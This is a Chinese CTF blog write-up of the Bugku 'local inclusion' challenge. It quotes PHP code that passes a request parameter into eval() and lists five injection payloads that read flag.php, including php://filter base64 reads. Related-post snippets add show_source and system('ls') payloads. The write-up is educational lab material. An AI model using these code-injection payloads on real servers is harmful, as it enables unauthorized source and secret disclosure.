Bugku 本地文本包含

最新推荐文章于 2023-10-24 11:12:19 发布
最新推荐文章于 2023-10-24 11:12:19 发布
阅读量356 收藏 1
点赞数
分类专栏: ctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/99125228
版权

Bugku 本地文本包含


include 'flag.php';
$a = @$_REQUEST['hello'];
eval(" var_dump( $a );");
highlight_file(__FILE__);
?>

解法:

    <1> hello=);print_r(file("flag.php")
    <2> hello=);var_dump(file("flag.php")
    <3> hello=file("flag.php")
    <4> hello=);include(@$_POST['b']POST区域:b=php://filter/convert.base64-encode/resource=flag.php
    <5> hello=);include("php://filter/convert.base64-encode/resource=flag.php"

几种函数的理解

  • file_get_contents() 读取文件为字符串
  • eval() 函数存在命令执行漏洞,构造出文件包含会把字符串参数当做代码来执行。
  • file() 函数把整个文件读入一个数组中,并将文件作为一个数组返回。
  • print_r() 函数只用于输出数组。
  • var_dump() 函数可以输出任何内容:输出变量的容,类型或字符串的内容,类型,长度。
  • hello=file(“flag.php”),最终会得到var_dump(file(“flag.php”)),以数组形式输出文件内容。
  • include()函数和php://input,php://filter结合很好用,php://filter可以用与读取文件源代码,结果是源代码base64编码后的结果。
HyyMbb
关注
专栏目录
BugKuCTF:web 本地包含;变量1
s0il的博客
01-07 1423
本地包含 文件包含漏洞: 为提高重用率,常把多次用到的代码写到一个 文件中,使用头文件方式进行代码的调用。 为了灵活,被调用的文件被命名为变量,但缺少对这个变量的限制 ,对文件名缺少合理的校验,或者校验被绕过,进而操作了意料之外的文件,导致文件泄露及恶意代码注入,从而导致用户可获取一定的服务器权限,文件包含在服务器本地则是本地包含包含在第三方服务网站就是远程包含。 几乎所有脚本语言都会提...
BUGKU-WEB
wojiushilsy的博客
02-22 561
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
bugku本地包含
YenKoc的博客
10-20 228
重点:eval()函数有执行漏洞 函数本身作用,把字符串当成php代码计算。 所以自然想到,可以把我们的写好的php代码写入进去。 题目又暗示在本地,想到flag.php了,所以想办法把文件里面的内容显示出来,file()函数可以将文件内容以数组形式显示出来。 so: ...
CTFBugku 本地包含
weixin_41607190的博客
10-04 214
原理:利用eval()函数的执行漏洞,不过滤参数执行我们提交的结果 我们提交的结果被执行之后,可以爆出网站后台文件得到flag 转载: https://blog.csdn.net/xuchen16/article/details/82734758 ...
Bugku—web—本地包含(wp)
我还在的博客
10-29 2151
0x00 前言 这是Bugku中web中的一道名为本地包含的题目。考察对PHP的知识。 0x01 解题过程 打开链接,你会看到一段PHP代码。 分析这段代码,最终得到攻击思路:通过构造名字为hello的攻击命令,把flag.php里面的代码以数组形式输出出来。 回车,则会看到flag ...
BugKu-web】lfi--本地包含
最新发布
weixin_73625393的博客
10-24 179
1.启动场景方法一:2.页面输入:flag:shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}方法二:双编写绕过。
bugkuctf web 部分wp(自己看得懂)
LJW_wenjingli7的博客
12-15 2583
1.本地管理员 进入网址,查源码,异常的一串n,拉进度条看 == 是base64,解出test123 ,像密码。 这种未知的系统一般要爆破,随便填账号密码,连接代理,打开bp 右键发到repeater,去掉cookie请求,用XXF伪造请求IP,(能考虑到管理员可能是admin,直接省略改名)改user=admin,发送即可 **XXF: X-Forwarded-For:(HTTP的请求端真实的IP) 如题中的:X-Forwarded-For:127.0.0.1 XFF注入..
bugku-本地包含(文件包含漏洞)
烟敛寒林的博客
09-04 1万+
方法一:eval存在命令执行漏洞,使用hello构造payload http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3 方法二: http://120.24.86.145:8003/index.php?hello=1);include $_POST['f']...
bugku CTF
qq_46116117的博客
04-06 1070
web题 矛盾: !is_numeric()函数: 用于检测变量是否为数字或数字字符串 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE 需要num不为数字字符串或者数字,但num=1; 则,num=1*e0.1或num=1x,x为任意字符 web3 查看源代码得 <!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&
bugku 本地包含 writeup
热门推荐
xuchen16的博客
09-17 3万+
转载自:https://blog.csdn.net/Sanky0u/article/details/77197523 本地包含 右键查看源代码   搜了一下@$_REQUEST 的意思是获得参数,不论是@$_GET还是@$_POST可以得到的参数@$_REQUEST都能得到。  所以构造hello的get参数。  $a应该最后会像字符串替换一样替换成hello的参数值吧。 &lt;1&gt...
BUGKU_(本地包含+成绩单)
qq_44832048的博客
10-27 223
本地包含 在网页中新建标签页打开链接后出现以下一些PHP代码, include “flag.php包含flag。。。 下面解析这段代码: request这个变量和_request这个变量和r​equest这个变量和_GET、$_POST一样,都属于超级全局变量,运行时修改后者不会影响前者,修改后者不会影响前者。在这里可以以get/post/cookies等方式把以hello为名的东西提交过来 ...
bugku题(本地包含和变量1)和Linux学习(四)
qq_43624349的博客
06-16 2562
本地包含 打开题目是下面的一些代码: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 这明显是PHP代码,然后进行分析。 这些代码涉及到的几个函数: 1.$_REQUEST: 可以获取以POS...
bugku web篇
Is_Linmouren的博客
10-31 1107
自己做题整理的解题思路
bugku ctf 文件包含2
qq_42777804的博客
08-08 4085
首先进去网站 发现是这么个东西       没有思路   只好右键查看源码   或 F12 发现注释文件upload.php,访问下来到文件上传页面 访问后发现     上传图片界面。。。 之后有两种方法!!!!!!!!!   1.     新建文档写入  &lt;script language=php&gt;system("ls")&lt;/script&gt;...
Bugku 文件包含
qq_52718293的博客
10-23 149
这题提示了是文件包含,利用php为协议读取文件就好,然后百度一下(推荐这个文),然后选用这个 http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名](针对php文件需要base64编码) 然后拿到base64一下 ok了 ...
CTF-Bugku逆向题Android方法归纳
am_03的博客
08-28 1449
1.signin题目: reverse() 功能:反转数组里的元素的顺序 语法:arrayobject.reverse.() 这类方法会改变原来的数组,不可逆转 tostring() 功能:将各类进制的数字转化为字符串 语法:number.toString(radix)(radix代表进制数) 字符串的管理地方是string.xml java在引用函数时要倒着引用 StringBuffer 当对字符串进行修改的时候,需要使用 StringBuffer 和 StringBuilder 类。 和 String
Bugku杂项
iczfy585的博客
10-29 393
怀疑人生 拿到一个名字为zip的文件,将其命名为1.zip,解压后得到了如下图所示的一个文件夹 对于第一个ctf1.zip,尝试去解压,发现要用密码。没有找到相关的提示,考虑直接用爆破。得到密码为:password 解压后得到一串字符: XHU2Nlx1NmNcdTYxXHU2N1x1N2JcdTY4XHU2MVx1NjNcdTZiXHU2NVx1NzI= base64解码后为: \u6...
bugku ctf 本地包含
qq_42777804的博客
04-16 748
地址:http://123.206.87.240:8003/ 打开之后 发现是一段php代码 百度搜了一下$_REQUEST PHP$_REQUEST是用于收集HTML表单提交的数据,PHP$_REQUEST属于PHP的超级全局变量。 应该是获得参数吧 所以构造hello的get参数 然后搜了一下各种函数的用途 eval() 函数存在命令执行漏洞,构造...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值